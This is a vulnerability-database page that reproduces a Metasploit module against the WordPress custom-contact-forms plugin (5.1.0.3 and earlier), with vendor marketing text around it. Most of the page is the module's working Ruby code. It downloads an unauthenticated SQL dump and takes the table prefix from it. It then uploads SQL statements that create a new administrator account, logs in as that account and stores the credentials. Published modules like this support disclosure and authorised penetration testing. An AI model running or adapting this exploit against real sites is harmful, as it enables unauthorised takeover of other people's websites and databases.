Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress custom-contact-forms Plugin SQL Upload

🗓️ 27 Sep 2014 11:42:49Reported by Marc-Alexandre Montpas, Christian Mehlmauer <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 61 Views

WordPress custom-contact-forms Plugin SQL Upload allows unauthenticated users to download a SQL dump of the database tables and upload files containing SQL statements for execution, potentially leading to the creation of a new admin user

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress custom-contact-forms Plugin SQL Upload',
        'Description' => %q{
          The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download
          a SQL dump of the plugins database tables. It's also possible to upload files containing
          SQL statements which will be executed. The module first tries to extract the WordPress
          table prefix from the dump and then attempts to create a new admin user.
        },
        'Author' => [
          'Marc-Alexandre Montpas', # Vulnerability discovery
          'Christian Mehlmauer' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html' ],
          [ 'URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=' ],
          [ 'WPVDB', '7542' ]
        ],
        'DisclosureDate' => '2014-08-07'
      )
    )
  end

  def get_sql(table_prefix, username, password)
    # create user
    sql = "INSERT INTO #{table_prefix}users (user_login, user_pass) VALUES ('#{username}','#{Rex::Text.md5(password)}');"
    # make user administrator
    sql << "INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{table_prefix}users where user_login='#{username}'),'#{table_prefix}capabilities','a:1:{s:13:\"administrator\";b:1;}'),((select id from #{table_prefix}users where user_login='#{username}'),'#{table_prefix}user_level','10');"

    sql
  end

  def get_table_prefix
    res = send_request_cgi({
      'uri' => wordpress_url_admin_post,
      'method' => 'POST',
      'vars_post' => {
        'ccf_export' => '1'
      }
    })
    return nil if res.nil? || res.code != 302 || res.headers['Location'] !~ /\.sql$/

    file = res.headers['Location']
    res_file = send_request_cgi('uri' => file)
    return nil if res_file.nil? || res_file.code != 200 || res_file.body.nil?

    match = res_file.body.match(/insert into `(.+_)customcontactforms_fields`/i)
    return nil if match.nil? || match.length < 2

    table_prefix = match[1]
    table_prefix
  end

  def run
    username = Rex::Text.rand_text_alpha(10)
    password = Rex::Text.rand_text_alpha(20)

    print_status('Trying to get table_prefix')
    table_prefix = get_table_prefix
    if table_prefix.nil?
      print_error('Unable to get table_prefix')
      return
    else
      print_status("got table_prefix '#{table_prefix}'")
    end

    data = Rex::MIME::Message.new
    data.add_part(get_sql(table_prefix, username, password), 'text/plain', nil, "form-data; name=\"import_file\"; filename=\"#{Rex::Text.rand_text_alpha(5)}.sql\"")
    data.add_part('1', nil, nil, 'form-data; name="ccf_merge_import"')
    post_data = data.to_s

    print_status("Inserting user #{username} with password #{password}")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => wordpress_url_admin_post,
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    )

    if res.nil? || res.code != 302 || res.headers['Location'] != 'options-general.php?page=custom-contact-forms'
      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # test login
    cookie = wordpress_login(username, password)

    # login successful
    if cookie
      print_good("User #{username} with password #{password} successfully created")
      store_valid_credential(user: username, private: password, proof: cookie)
    else
      print_error('User creation failed')
      return
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Feb 2023 14:30Current
7.9High risk
Vulners AI Score7.9
wordpress custom-contact-formssql uploadunauthenticateddatabase tablessql statementsplugin vulnerabilityadmin user creation
61